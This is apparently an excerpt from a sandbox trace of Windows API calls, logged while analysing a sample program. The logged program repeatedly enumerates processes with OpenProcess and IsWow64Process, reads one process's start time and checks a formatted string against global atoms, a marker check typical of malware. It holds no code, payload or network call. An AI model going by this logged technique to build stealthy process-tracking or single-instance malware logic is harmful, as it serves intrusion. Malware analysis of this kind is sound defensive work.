	[0095.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0095.340] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.340] CloseHandle (hObject=0x248) returned 1
	[0095.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.340] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.340] CloseHandle (hObject=0x248) returned 1
	[0095.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.340] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.340] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0095.341] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0095.341] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0095.341] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.341] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0095.341] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.341] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0095.341] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0095.341] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0095.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0095.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0095.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0095.342] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.342] CloseHandle (hObject=0x248) returned 1
	[0095.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0095.342] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.342] CloseHandle (hObject=0x248) returned 1
	[0095.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0095.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0095.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0095.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0095.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0095.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0095.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0095.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0095.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0095.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0095.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0095.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0095.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0095.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0095.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0095.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0095.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0095.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0095.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0095.414] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.414] CloseHandle (hObject=0x248) returned 1
	[0095.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0095.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0095.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0095.414] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.414] CloseHandle (hObject=0x248) returned 1
	[0095.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0095.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0095.415] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.415] CloseHandle (hObject=0x248) returned 1
	[0095.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0095.415] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.415] CloseHandle (hObject=0x248) returned 1
	[0095.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0095.415] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.415] CloseHandle (hObject=0x248) returned 1
	[0095.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0095.415] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.415] CloseHandle (hObject=0x248) returned 1
	[0095.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0095.415] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.415] CloseHandle (hObject=0x248) returned 1
	[0095.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0095.416] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.416] CloseHandle (hObject=0x248) returned 1
	[0095.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0095.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0095.416] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.416] CloseHandle (hObject=0x248) returned 1
	[0095.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0095.416] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.416] CloseHandle (hObject=0x248) returned 1
	[0095.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0095.416] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.416] CloseHandle (hObject=0x248) returned 1
	[0095.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0095.417] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.417] CloseHandle (hObject=0x248) returned 1
	[0095.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0095.417] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.417] CloseHandle (hObject=0x248) returned 1
	[0095.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0095.417] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.417] CloseHandle (hObject=0x248) returned 1
	[0095.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0095.417] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.417] CloseHandle (hObject=0x248) returned 1
	[0095.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0095.417] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.417] CloseHandle (hObject=0x248) returned 1
	[0095.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0095.418] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.418] CloseHandle (hObject=0x248) returned 1
	[0095.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0095.418] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.418] CloseHandle (hObject=0x248) returned 1
	[0095.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0095.418] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.418] CloseHandle (hObject=0x248) returned 1
	[0095.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0095.418] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.418] CloseHandle (hObject=0x248) returned 1
	[0095.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0095.418] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.418] CloseHandle (hObject=0x248) returned 1
	[0095.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0095.418] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.419] CloseHandle (hObject=0x248) returned 1
	[0095.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0095.419] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.419] CloseHandle (hObject=0x248) returned 1
	[0095.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0095.419] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.419] CloseHandle (hObject=0x248) returned 1
	[0095.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0095.419] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.419] CloseHandle (hObject=0x248) returned 1
	[0095.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0095.419] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.419] CloseHandle (hObject=0x248) returned 1
	[0095.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0095.419] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.419] CloseHandle (hObject=0x248) returned 1
	[0095.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0095.420] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.420] CloseHandle (hObject=0x248) returned 1
	[0095.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0095.420] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.420] CloseHandle (hObject=0x248) returned 1
	[0095.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0095.420] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.420] CloseHandle (hObject=0x248) returned 1
	[0095.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.420] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.420] CloseHandle (hObject=0x248) returned 1
	[0095.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.421] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.421] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0095.421] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0095.421] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0095.421] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.421] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0095.422] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.422] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0095.422] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0095.422] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0095.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0095.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0095.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0095.422] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.422] CloseHandle (hObject=0x248) returned 1
	[0095.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0095.422] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.423] CloseHandle (hObject=0x248) returned 1
	[0095.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0095.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0095.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0095.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0095.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0095.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0095.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0095.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0095.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0095.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0095.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0095.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0095.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0095.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0095.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0095.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0095.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0095.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0095.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0095.495] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.495] CloseHandle (hObject=0x248) returned 1
	[0095.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0095.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0095.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0095.495] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.495] CloseHandle (hObject=0x248) returned 1
	[0095.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0095.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0095.496] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.496] CloseHandle (hObject=0x248) returned 1
	[0095.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0095.496] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.496] CloseHandle (hObject=0x248) returned 1
	[0095.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0095.496] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.496] CloseHandle (hObject=0x248) returned 1
	[0095.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0095.496] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.496] CloseHandle (hObject=0x248) returned 1
	[0095.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0095.496] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.496] CloseHandle (hObject=0x248) returned 1
	[0095.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0095.497] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.497] CloseHandle (hObject=0x248) returned 1
	[0095.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0095.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0095.497] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.497] CloseHandle (hObject=0x248) returned 1
	[0095.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0095.497] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.497] CloseHandle (hObject=0x248) returned 1
	[0095.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0095.497] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.497] CloseHandle (hObject=0x248) returned 1
	[0095.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0095.497] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.497] CloseHandle (hObject=0x248) returned 1
	[0095.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0095.498] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.498] CloseHandle (hObject=0x248) returned 1
	[0095.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0095.498] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.498] CloseHandle (hObject=0x248) returned 1
	[0095.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0095.498] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.498] CloseHandle (hObject=0x248) returned 1
	[0095.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0095.498] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.498] CloseHandle (hObject=0x248) returned 1
	[0095.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0095.498] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.499] CloseHandle (hObject=0x248) returned 1
	[0095.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0095.499] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.499] CloseHandle (hObject=0x248) returned 1
	[0095.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0095.499] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.499] CloseHandle (hObject=0x248) returned 1
	[0095.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0095.499] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.499] CloseHandle (hObject=0x248) returned 1
	[0095.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0095.499] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.499] CloseHandle (hObject=0x248) returned 1
	[0095.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0095.499] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.499] CloseHandle (hObject=0x248) returned 1
	[0095.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0095.500] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.500] CloseHandle (hObject=0x248) returned 1
	[0095.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0095.500] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.500] CloseHandle (hObject=0x248) returned 1
	[0095.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0095.500] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.500] CloseHandle (hObject=0x248) returned 1
	[0095.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0095.500] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.500] CloseHandle (hObject=0x248) returned 1
	[0095.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0095.500] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.500] CloseHandle (hObject=0x248) returned 1
	[0095.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0095.501] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.501] CloseHandle (hObject=0x248) returned 1
	[0095.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0095.501] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.501] CloseHandle (hObject=0x248) returned 1
	[0095.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0095.501] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.501] CloseHandle (hObject=0x248) returned 1
	[0095.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.501] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.501] CloseHandle (hObject=0x248) returned 1
	[0095.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.502] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.502] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0095.502] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0095.502] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0095.502] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.502] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0095.503] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.503] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0095.503] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0095.503] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0095.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0095.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0095.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0095.503] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.503] CloseHandle (hObject=0x248) returned 1
	[0095.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
